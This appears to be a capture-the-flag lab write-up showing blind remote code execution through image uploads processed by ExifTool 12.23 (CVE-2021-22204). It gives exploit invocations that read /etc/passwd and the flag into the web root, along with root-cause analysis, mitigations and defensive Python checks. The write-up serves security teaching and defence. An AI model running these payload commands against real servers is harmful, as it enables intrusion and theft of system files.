Blind Remote Code Execution via ExifTool CVE-2021-22204 | The Oak
Lab Link
Lab: The Oak
Overview
The Oak challenge demonstrates how a vulnerable third-party component in an image-processing pipeline can lead to complete server compromise.
During testing, user-uploaded profile images were processed server-side. By comparing the original uploaded image with the server-generated version, it became apparent that the application was using an outdated version of ExifTool.
Further analysis revealed that the server was running ExifTool 12.23, a version vulnerable to CVE-2021-22204, a critical arbitrary code execution vulnerability involving DjVu metadata parsing.
Because uploaded images were automatically processed after upload, it became possible to achieve blind remote command execution through a crafted malicious image.
Objective
Gain remote code execution through the image upload functionality and retrieve the flag from the target system.
Vulnerability Identification
Classification Hierarchy
OWASP Top 10:2025
└── A03 - Software Supply Chain Failures
    └── Vulnerable Third-Party Component
        └── ExifTool 12.23
            └── CVE-2021-22204
                └── Arbitrary Code Execution
Vulnerable Functionality
Profile image uploads are available at:
/account/profile.php
After uploading an image, the application stores it under:
/uploads/avatars/
The server automatically processes uploaded files before making them available for download.
Reconnaissance
Create an Account
Register a new user account:
/register.php
After authentication, navigate to:
/account/profile.php
and upload a test image.
Locate Uploaded File
Reviewing Burp Suite history revealed the generated image path:
/uploads/avatars/u6-images.jpeg
The processed image could then be downloaded directly.
Metadata Analysis
Compare:
- Original image
- Server-generated image
Using ExifTool:
exiftool original.jpg
exiftool downloaded.jpg
The original image contained no ExifTool-generated metadata.
However, the downloaded image contained:
Software : ExifTool 12.23
This immediately identified the image-processing backend.
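The comparison above can be scripted so that every processed upload is fingerprinted the same way. The following Python is an added example, not code from the lab or from ExifTool itself: it walks the JPEG marker segments, reads the EXIF Software tag (0x0131) out of IFD0, and checks an "ExifTool X.Y" value against the range CVE-2021-22204 covers (7.44 through 12.23, fixed in 12.24). The sample JPEG it builds is constructed for the demonstration and the function names are my own.

```python
import re
import struct

# CVE-2021-22204 affects ExifTool 7.44 through 12.23; 12.24 carries the fix.
AFFECTED_MIN = (7, 44)
AFFECTED_MAX = (12, 23)


def iter_jpeg_segments(data):
    """Yield (marker, payload) for each marker segment before the scan data (SOS) or EOI."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: SOI marker missing")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("expected marker at offset %d" % pos)
        marker = data[pos + 1]
        if marker == 0xFF:                              # fill byte, skip it
            pos += 1
            continue
        if marker in (0xD9, 0xDA):                      # EOI, or SOS: entropy-coded data follows
            return
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:    # TEM / RSTn carry no length field
            pos += 2
            continue
        if pos + 4 > len(data):
            raise ValueError("truncated segment header at offset %d" % pos)
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        yield marker, data[pos + 4:pos + 2 + length]
        pos += 2 + length


def exif_software(data):
    """Return the EXIF Software tag (0x0131) from IFD0 of a JPEG, or None if absent."""
    for marker, payload in iter_jpeg_segments(data):
        if marker != 0xE1 or not payload.startswith(b"Exif\x00\x00"):
            continue
        tiff = payload[6:]                              # TIFF header: byte order, 42, IFD0 offset
        endian = {b"II": "<", b"MM": ">"}.get(tiff[:2])
        if endian is None or struct.unpack(endian + "H", tiff[2:4])[0] != 42:
            continue
        (ifd0,) = struct.unpack(endian + "I", tiff[4:8])
        (count,) = struct.unpack(endian + "H", tiff[ifd0:ifd0 + 2])
        for i in range(count):
            entry = ifd0 + 2 + 12 * i
            tag, typ, n = struct.unpack(endian + "HHI", tiff[entry:entry + 8])
            if tag != 0x0131 or typ != 2:               # type 2 = ASCII
                continue
            if n <= 4:                                  # short values live inside the entry
                raw = tiff[entry + 8:entry + 8 + n]
            else:                                       # longer values: the entry holds an offset
                (off,) = struct.unpack(endian + "I", tiff[entry + 8:entry + 12])
                raw = tiff[off:off + n]
            return raw.split(b"\x00", 1)[0].decode("ascii", "replace")
    return None


def exiftool_version_affected(software):
    """True/False for an 'ExifTool X.Y' string; None when the tag names another tool or is missing."""
    if software is None:
        return None
    m = re.fullmatch(r"ExifTool\s+(\d+)\.(\d+)", software.strip())
    if not m:
        return None
    version = (int(m.group(1)), int(m.group(2)))
    return AFFECTED_MIN <= version <= AFFECTED_MAX


def build_exif_jpeg(software):
    """Constructed sample: the smallest JPEG that carries an EXIF Software tag (little-endian TIFF)."""
    value = software.encode("ascii") + b"\x00"
    if len(value) <= 4:
        entry, tail = struct.pack("<HHI", 0x0131, 2, len(value)) + value.ljust(4, b"\x00"), b""
    else:                                               # IFD0 at 8: count(2) + entry(12) + next(4) = 26
        entry, tail = struct.pack("<HHII", 0x0131, 2, len(value), 26), value
    tiff = b"II*\x00" + struct.pack("<I", 8) + struct.pack("<H", 1) + entry + struct.pack("<I", 0) + tail
    app1 = b"Exif\x00\x00" + tiff
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"


if __name__ == "__main__":
    original = b"\xff\xd8\xff\xd9"                      # constructed stand-in for the untouched upload
    processed = build_exif_jpeg("ExifTool 12.23")       # constructed stand-in for the server's copy
    for name, sample in (("original", original), ("processed", processed)):
        tag = exif_software(sample)
        print("%s: Software=%r affected=%r" % (name, tag, exiftool_version_affected(tag)))
```

Run it against the real pair by reading original.jpg and the downloaded avatar into bytes; the original yields no Software tag while the processed copy yields the ExifTool string, which is exactly the diff the manual comparison showed.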
Vulnerable Component Discovery
Researching ExifTool 12.23 turned up a public advisory and a matching exploit:
CVE-2021-22204
ExifTool 12.23 - Arbitrary Code Execution
The bug is in ExifTool's DjVu annotation parser. Versions 7.44 through 12.23 expand C-style escape sequences in a quoted annotation string by passing the string through Perl eval, so a crafted DjVu document runs attacker-supplied code the moment ExifTool reads its metadata. The upload does not have to be a DjVu file: ExifTool also parses DjVu data embedded in the metadata of an ordinary JPEG.
Exploitation
Environment Setup
Install the required dependencies (the exploit uses djvumake from djvulibre-bin to build the DjVu document and exiftool to embed it in a JPEG):
sudo apt install -y djvulibre-bin exiftool
Obtain the public exploit (Exploit-DB 50911):
50911.py
Initial Proof of Execution
Generate a malicious image:
python3 50911.py -c "id"
This creates:
image.jpg
Upload the generated image through:
/account/profile.php
The upload succeeded and the response carried no command output. If the command ran at all, it ran blind, so confirmation has to come through a side channel.
Blind Command Execution Verification
Because nothing is reflected, have the command write a marker into the directory the application serves avatars from and then fetch it over HTTP. This assumes the document root is /var/www/html, so that /var/www/html/uploads/avatars/ is the /uploads/avatars/ path seen earlier; the fetch in the next step confirms that assumption.
Generate a new payload:
python3 50911.py -c "echo pwned > /var/www/html/uploads/avatars/pwned.txt"
Upload the malicious image.
Confirming RCE
Browse to:
/uploads/avatars/pwned.txt
Response:
pwned
This confirms arbitrary command execution on the server.
Proof of Exploitation
Reading System Files
Generate a payload that copies /etc/passwd into a web-accessible file:
python3 50911.py -c "cat /etc/passwd > /var/www/html/uploads/avatars/pwned.txt"
Upload the image.
Visiting:
/uploads/avatars/pwned.txt
returned the contents of:
/etc/passwd
confirming full command execution and file read capabilities.
Retrieving the Flag
Generate a payload that copies the flag into a readable location:
python3 50911.py -c "cat /flag.txt > /var/www/html/uploads/avatars/flag.txt"
Upload the image.
Navigate to:
/uploads/avatars/flag.txt
The application returned the flag file contents.
Root Cause Analysis
The application processes uploaded images using:
ExifTool 12.23
This version is vulnerable to:
CVE-2021-22204
ExifTool does not need a .djvu file to reach the vulnerable code: it also parses DjVu documents embedded in the metadata of other formats, and the upload pipeline runs it on every avatar. In the affected versions the DjVu annotation parser expands C-style escape sequences in quoted annotation strings by passing the string through Perl eval. Its attempt to neutralise the `$` sigil before the eval can be bypassed with a preceding `\c` escape, so a crafted annotation interpolates attacker-controlled Perl, and through it a shell command, while the metadata is being read.
Two decisions compound the bug: the application runs metadata extraction on untrusted content with an outdated dependency, and it runs it with enough privilege to write into the web root, which is what turned blind execution into a confirmed compromise.
Impact
Successful exploitation allows an attacker to:
- Execute arbitrary operating system commands
- Read sensitive files
- Access application secrets
- Retrieve environment variables
- Pivot further into the system
- Achieve complete server compromise
In a production environment this could result in:
- Customer data exposure
- Credential theft
- Database compromise
- Full infrastructure takeover
Mitigation
Update ExifTool
Check the installed version:
exiftool -ver
CVE-2021-22204 affects ExifTool 7.44 through 12.23. Upgrade to 12.24 or later, and pin that floor in the image build so a rebuild cannot reintroduce an older package.
Restrict Image Processing
Do not run metadata extraction on untrusted uploads inside the web application's own process or with its privileges; hand the file to a separate, low-privilege worker.
Sandbox Media Parsers
Run image-processing components inside isolated containers or under a mandatory access control profile that confines what the parser can read, write and execute:
- Docker
- Firejail
- AppArmor
- SELinux
Content Validation
Implement strict validation for:
- MIME types
- File signatures
- File structure
- Embedded metadata
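For the embedded-metadata check above, and for the mechanism described under Root Cause Analysis, the following Python is an added example rather than code from the lab or from ExifTool: it scans an upload for a DjVu container (the AT&T/FORM IFF header), walks the container's chunks, pulls out the raw annotation chunk (ANTa) and flags backslash escapes in it, which is the input that ExifTool 7.44 through 12.23 mishandled. A JPEG avatar has no business carrying DjVu data at all, so validate_avatar rejects on presence alone and reports the escape finding as context. The DjVu sample and the JPEG wrapper are constructed for the demonstration, the sample annotation is not a working exploit, and the function names are my own.

```python
import struct

DJVU_MAGIC = b"AT&TFORM"   # every DjVu document starts with "AT&T" followed by a FORM chunk


def parse_djvu_chunks(blob):
    """Walk the top-level FORM of an IFF85/DjVu container that starts at blob[0].

    Returns a list of (chunk_id, data). The first element records the FORM type
    (DJVU for a single page, DJVM for a bundled document); nested FORMs are not
    descended into, which is enough for the check below.
    """
    if len(blob) < 16 or not blob.startswith(DJVU_MAGIC):
        raise ValueError("not a DjVu container")
    (form_len,) = struct.unpack(">I", blob[8:12])
    chunks = [("FORM:" + blob[12:16].decode("ascii", "replace"), b"")]
    pos, end = 16, min(12 + form_len, len(blob))
    while pos + 8 <= end:
        cid = blob[pos:pos + 4].decode("ascii", "replace")
        (clen,) = struct.unpack(">I", blob[pos + 4:pos + 8])
        chunks.append((cid, blob[pos + 8:pos + 8 + clen]))
        pos += 8 + clen + (clen & 1)        # IFF chunks are padded to an even length
    return chunks


def scan_for_djvu(data):
    """Report every DjVu container found anywhere in data, whatever segment or tag wraps it."""
    findings, start = [], 0
    while (off := data.find(DJVU_MAGIC, start)) >= 0:
        try:
            chunks = parse_djvu_chunks(data[off:])
        except ValueError:
            chunks = [("<truncated>", b"")]
        annotation = b"".join(d for cid, d in chunks if cid == "ANTa")
        findings.append({
            "offset": off,
            "chunks": [cid for cid, _ in chunks],
            "annotation": annotation.decode("latin-1"),
            "compressed_annotation": any(cid == "ANTz" for cid, _ in chunks),
            "escapes_in_annotation": b"\\" in annotation,   # the escape path is what the eval bug was in
        })
        start = off + len(DJVU_MAGIC)
    return findings


def validate_avatar(data):
    """Gate for a JPEG avatar pipeline. Returns (accepted, reason)."""
    if data[:2] != b"\xff\xd8":
        return False, "not a JPEG (SOI marker missing)"
    hits = scan_for_djvu(data)
    if not hits:
        return True, "ok"
    hit = hits[0]
    reason = "embedded DjVu container at offset %d (chunks: %s)" % (hit["offset"], ", ".join(hit["chunks"]))
    if hit["escapes_in_annotation"]:
        reason += "; annotation contains backslash escapes"
    elif hit["compressed_annotation"]:
        reason += "; annotation is BZZ-compressed (ANTz) and was not inspected"
    return False, reason


def build_djvu(annotation):
    """Constructed sample: a one-page DjVu with an INFO chunk and a raw ANTa annotation."""
    def chunk(cid, payload):
        return cid + struct.pack(">I", len(payload)) + payload + (b"\x00" if len(payload) & 1 else b"")
    # INFO: width, height (big-endian), minor/major version, dpi (little-endian), gamma, flags
    info = struct.pack(">HH", 1, 1) + bytes([26, 0]) + struct.pack("<H", 300) + bytes([22, 0])
    return b"AT&T" + chunk(b"FORM", b"DJVU" + chunk(b"INFO", info) + chunk(b"ANTa", annotation))


def embed_in_jpeg(blob):
    """Constructed sample: hide blob in an APP1 segment of an otherwise empty JPEG.

    The public exploit carries the DjVu document inside an EXIF tag; the scanner
    does not care which segment holds it, so a bare APP1 is enough here.
    """
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(blob) + 2) + blob + b"\xff\xd9"


if __name__ == "__main__":
    clean = b"\xff\xd8\xff\xd9"
    smuggled = embed_in_jpeg(build_djvu(b'(metadata (Title "esc\\aped"))'))   # constructed, not a working payload
    for sample in (clean, smuggled):
        print(validate_avatar(sample))
```

Run validate_avatar on the bytes of any upload before it reaches the processing worker and log the reason string; rejecting on the container's presence keeps the check independent of which escape trick a given payload uses.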
Principle of Least Privilege
Run the image-processing worker as its own user with write access only to a staging directory outside the document root. The blind-RCE confirmation above only worked because the ExifTool process could write into /var/www/html/uploads/avatars/.
Real-World Insight
CVE-2021-22204 drew wide attention because applications that run ExifTool on user uploads reach the vulnerable code automatically, with no interaction beyond the upload itself. The best-known case was GitLab, whose upload handling passed files to ExifTool and was exploited in the wild through this bug (tracked on the GitLab side as CVE-2021-22205).
This challenge highlights a common security issue:
The application itself may not contain the vulnerability.
A vulnerable third-party component can still lead to complete compromise.
Supply-chain failures remain one of the most dangerous attack vectors because a single outdated dependency can expose an otherwise secure application to remote code execution.
